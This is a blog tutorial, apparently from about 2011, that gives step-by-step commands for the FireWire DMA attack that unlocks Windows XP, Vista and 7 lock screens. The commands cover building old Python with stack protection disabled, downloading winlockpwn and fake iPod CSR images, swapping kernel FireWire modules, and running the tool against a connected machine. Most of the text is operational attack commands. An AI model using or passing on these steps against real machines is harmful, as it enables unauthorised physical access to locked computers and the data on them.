Update: I’ve released a tool at github called Inception, which uses libforensic1394 to unlock Windows XP, Vista and Windows 7 boxes. IMNSHO, it is much more stable than winlockpwn, easier to use and works against a wider spectrum of target operating systems.
Quite regularly I’m being asked to demonstrate the FireWire attack made by MetlStorm aka Adam Boileau (http://www.storm.net.nz/projects/16 [site down as of May 20]) where an attacker unlocks a Windows machine by writing to the victim machine’s memory via FireWire. It’s kind of a party trick hack, but it never stops to amaze people. A couple of days ago I demonstrated the trick at AFSecurity, and I was asked if it was easy to find a good description on how to do it.
Well, sort of. There’s an excellent guide here, but several of the commands does not work out of the box on Ubuntu anymore, so I’ve created this little tutorial. All hail to Tim for creating the original. Also, the original source of the tool have disappeared from the net, so I’ve started hosting my own version of the tool right here. Metlstorm, if you read this, apologies in advance. Let me buy you a beer sometime! Or get your site up again :-)
So here’s how to do the hack on
Ubuntu 11.04 (Natty Narwhal) Ubuntu 10.10 (Maverick Meerkat):
(Update: According to this thread, the raw1394 device is no longer supported as of Ubuntu 11.04, I’ll try to figure out how to use the tool with the new FireWire stack (JuJu)).
Get the dependencies
First, get the stuff we need to be able to compile the winlockpwn tool and necessary FireWire driver:
sudo apt-get install build-essential linux-headers-$(uname -r) libdc1394-22 libraw1394-dev swig
Secondly, we need to download and compile Python 2.3:
wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz tar xvfz Python-2.3.6.tgz cd Python-2.3.6 ./configure
Now, since this old python version has several potential buffer overflow vulnerabilities, we have to tell gcc to quietly ignore them by editing the Makefile. Open the makefile in your favourite text editor, and change the following lines:
BASECFLAGS= -fno-strict-aliasing -fno-stack-protector -U_FORTIFY_SOURCE
Then compile and make an alternative install (that will make the new (old) python libraries co-reside nicely with your existing python libraries):
make sudo make altinstall
Fix up the libraw1394:
sudo vim /usr/include/libraw1394/raw1394.h
Search for and comment out all references to the ‘__attribute__ ((deprecated));’ and be sure to put an ending semicolon on the previous line.
Download and install winlockpwn
Since Adam Bolieu’s site is down, I’ve taken the liberty of hosting the tool files here. I’ve also added some more csr’s and signatures for Windows XP SP3, Vista 32 and 64-bit, Ubuntu 9.04 and Windows 7 32 and 64-bit. Woohoo!
wget http://www.breaknenter.org/files/winlockpwn/pythonraw1394-1.0.tar.gz tar xvfz pythonraw1394-1.0.tar.gz cd pythonraw1394 wget http://www.breaknenter.org/files/winlockpwn/winlockpwn chmod +x ./winlockpwn vim Makefile (reference /usr/local/bin/python2.3 instead of /usr for python) make
Unload the default Ubuntu FireWire drivers and load your own:
sudo modprobe -r firewire_ohci sudo modprobe -r firewire_core sudo modprobe ohci1394 sudo modprobe raw1394
Give write permissions to the firewire device:
sudo chmod 666 /dev/raw1394
Edit the first line of the files romtool, businfo and winlockpwn to reference the python 2.3 location as installed above, then load the ipod image (or any of the other csr’s) to the firewire port:
sudo ./romtool -s 0 ipod.csr
Run businfo to check the port configurations:
Check the node list. Node 0 is the Windows machine, node 1 should be the fake iPod. Connect to the Windows machine using a firewire cable, and watch as Windows loads the firewire drivers, recognizes the iPod and gives it DMS. At last, run winlockpwn (example parameters below):
sudo ./winlockpwn 0 0 2
You can get a quick explanation of the winlockpwn parameters by running the command without parameters. If you’re having trouble getting DMA access, try some of the other ROM csr’s. Also, verify that no other firewire drivers (than the ones loaded above) are present by issuing the following commands:
lsmod | grep 1394 lsmod | grep firewire